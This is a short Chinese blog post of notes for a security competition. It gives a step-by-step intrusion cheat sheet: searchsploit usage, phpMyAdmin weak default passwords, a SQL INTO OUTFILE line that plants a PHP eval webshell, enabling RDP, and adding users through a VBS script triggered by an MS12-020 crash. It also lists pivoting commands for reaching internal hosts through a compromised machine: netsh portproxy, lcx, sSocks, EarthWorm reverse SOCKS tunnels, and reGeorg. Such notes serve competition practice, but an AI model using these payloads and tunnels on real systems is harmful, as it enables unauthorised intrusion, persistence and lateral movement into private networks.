铁人三项赛_笔记

searchsploit 中间件的名称版本

用来搜索相关版本的exp

找到相关版本的exp 后,less 查看exp ,查看用法与编译方法,实在看不懂去Google搜

然后将exp复制到另一个目录,编译,执行。实现exp所对应的功能

netdiscover 内网主机发现

robots.txt

 phpinfo

网站绝对路径

Nessus扫描

phpmyadmin 后台弱口令(root/root  rooot/空)登陆,后台写shell

或者查看phpmyadmin版本搜索相关漏洞及exp

 

select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'

tip:用菜刀连一句话的时候记得在url前面添加http://

连上菜刀,开3389,想办法添加用户,或者上传木马,或Nessuss扫一下是否有其他漏洞可以利用。这里是上传的添加用户的vbs脚本,传到启动的路径下,利用 12-020远程溢出,导致服务器蓝屏重启运行vbs

 

内网转发基础

windows下的内网转发

Netsh是windows自带的命令行脚本工具,基于socke协议,允许从本地或远程显示或修改当前正在运行的计算机的网络配置。

A为内网主机,B为已经拿下的主机,C为外网攻击机

B:  netsh interface portproxy add v4tov4 listenaddress=192.168.20.248 listenport=666 connectaddress=192.168.159.134 connectport=80
#B主机将192.168.159.134的80端口转发到外网攻击机的666端口,外网攻击机直接访问192.168.20.248:666就能连接到A主机的80端口
#查看转发
B: netsh interface portproxy show all

#删除

B:  netsh interface portproxy delete v4tov4 listenaddress=192.168.20.248 listenport=666

Lcx

#lcx正向代理
B: lcx -tran 888 192.168.159.134 80 #将192.168.159.134:80的流量转发到本地的888端口。接下来攻击机C直接访问192.168.11.239:888即可

lcx反向代理

代理端B:  lcx slave 192.168.11.248 666 192.168.159.134 80

攻击机C: lcx -listen 666 777

#将666端口的流量转发到777端口,

攻击机本地访问127.0.0.1:777就能接收到159.134:80的流量了

sSocks 不支持ping

攻击机C(客户端) ./rcsocks -l 9999 -p 1080 -vv
#监听1080,9999端口 已经拿下的机器B(代理端) .
/rssocks -vv -s 192.168.137.135:1080
#代理端连接攻击机的1080端口

Ew(earth worm)反向代理

攻击机C :  ew.exe -s rcsocks -l 888 -e 777 

#将攻击机888端口的流量都转到本地端口777

代理机B  ew.exe -s rssocks -d 192.168.137.135 -e 777

#将代理机的流量全部转到192.168.137.135777

最后用sockscap64设置代理127.0.0.1:888端口,或者直接chrome设置代理sock5   127.0.0.1:888

reGeorg:web代理,所有流量通过http转发

 

posted @ 2018-12-05 11:15  1go0  阅读(398)  评论(0编辑  收藏  举报